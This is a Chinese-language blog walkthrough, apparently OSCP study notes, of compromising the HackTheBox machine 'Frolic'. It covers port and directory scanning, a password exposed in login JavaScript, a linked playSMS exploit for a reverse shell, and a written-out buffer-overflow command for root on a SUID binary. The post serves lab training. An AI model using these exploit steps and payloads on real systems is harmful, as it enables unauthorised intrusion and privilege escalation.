OSCP备考_0x21_HackThBox靶机_Linux_frolic

Ethan医生5个月前靶场182

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)

image.png

nmap -p139,445 -A -T5 --script=smb-enum-shares 10.129.135.112

image.png


nmap -sU --top-ports 100 10.129.135.112 (扫描UDP)

image.png

gobuster dir -u http://10.129.135.112:9999/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png




http://10.129.135.112:1880/

image.png

http://10.129.135.112:9999/

image.png


http://10.129.135.112:9999/backup/

image.png

再尝试登入admin的时后发现没有提交到后台 查看下前端验证,http://10.129.135.112:9999/admin/js/login.js

很明显密码为superduperlooperpassword_lol

image.png

image.png

登入成功后出现这个

https://www.dcode.fr/ook-language尝试解密

Nothing here check /asdiSIAJJ0QWE9JAS


http://10.129.135.112:9999/backup/password.txt

image.png

image.png

出现账号密码:imnothuman,尝试登入1880端口也无法登入

http://10.129.135.112:9999/asdiSIAJJ0QWE9JAS/

image.png

访问后发现类似base64的挡案 直接进行解密后保存 看文件挡案是啥

image.png

然后进行爆破

image.png

发现16进制文件

image.png


解密出来跟上面一样 ,又回到刚开始的密码学知识点,再次将其解密,地址:https://www.splitbrain.org/_static/ook/



然后扫描路径的时后发现/dev/backup底下还有个cms

直接使用cms拿下SHELL

http://10.129.135.112:9999/playsms/index.php?app=main&inc=core_auth&route=login

image.png


对应的exploit地址:https://www.exploit-db.com/exploits/42044

反弹SHELL结束后...

读取完成user.txt之后查找4000权限的文件

找到一个二进制文件,知道本靶机需要使用缓冲区溢出漏洞进行提权,具体分析可参考:https://0xdf.gitlab.io/2019/03/23/htb-frolic.html

./rop `python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + '\xd0\x79\xe4\xb4' + '\x0b\x4a\xf7\xb7'"`


标签: OSCP

相关文章

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。